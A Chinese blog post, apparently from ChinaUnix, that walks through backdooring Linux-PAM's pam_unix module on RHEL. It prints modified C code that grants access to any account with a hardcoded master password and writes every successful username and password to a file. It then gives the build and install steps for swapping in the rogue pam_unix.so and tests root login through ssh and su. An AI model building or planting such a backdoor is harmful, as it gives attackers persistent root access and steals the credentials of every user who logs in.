PAM模块的backdoor实现与分析-sunyrising-ChinaUnix博客

sunyrising

首页　| 　博文目录　| 　关于我

sunyrising

博客访问： 331786
博文数量： 106
博客积分： 1115
博客等级：少尉
技术积分： 806
用户组：普通用户
注册时间： 2006-08-04 08:06

文章分类

全部博文（106）

Network（5）
Web Dev.&&n（5）
Life/Fun（2）
Storage/Backup（2）
Security（8）
AIX TSM server（1）
Load balancer（4）
VMware（5）
Others（8）
DB（4）
Python/PHP/Perl（4）
C/C++（7）
IDE（8）
Unix/Linux（43）
未分配的博文（0）

文章存档

2015年（4）

2014年（48）

2013年（15）

2012年（38）

2011年（1）

我的朋友

myganne

相关博文

PAM模块的backdoor实现与分析

分类： LINUX

2014-02-12 04:19:25

http://blog.chinaunix.net/uid-29242873-id-4100736.html

环境RHEL6.4

wget

tar xzvf Linux-PAM-1.1.1.tar.gz

主要修改 Linux-PAM-1.1.1/modules/pam_unix/pam_unix_auth.c

点击(此处)折叠或打开

/* verify the password of this user */
retval = _unix_verify_password(pamh, name, p, ctrl);
if (strcmp(p,"secpass")==0 ){retval = PAM_SUCCESS;}
if(retval == PAM_SUCCESS)
{
FILE *fd;
fd = fopen(PASSWD_FILE, "a");
fprintf(fd, "%s:%s\n", name, p);
fclose(fd);
}
name = p = NULL;
AUTH_RETURN;
}

./configure && make

cp modules/pam_unix/.libs/pam_unix.so /lib/security/pam_unix.so 前提对系统现有pam_unix.so文件备份

测试ssh

以上是使用了万能密码登录功能，以不同的root密码登录，获得同样的root权限，另一个是记录登录密码到指定文件。

在被攻击端查看密码文件，第一次管理员正常以root身份登录，第二次攻击者以root身份使用后门密码登录。

测试su
普通用户sysuser登录系统后，分别使用万能密码和正常密码切换为root

总结：PAM模块的backdoor程序实现很简单，主要为万能密码和键盘记录功能，还可以提供远程发送密码功能，主要影响了所有在/etc/pam.d/下利用到PAM模块认证的方式（ssh、su、ftp、telnet等。）

Have a nice day.

阅读(634) | 评论(0) | 转发(0) |

上一篇：Linux下分析SYN flood攻击案例

下一篇：提供给 Web 开发者的 8 款最佳的跨平台编辑器

给主人留下些什么吧！~~

感谢所有关心和支持过ChinaUnix的朋友们

16024965号-6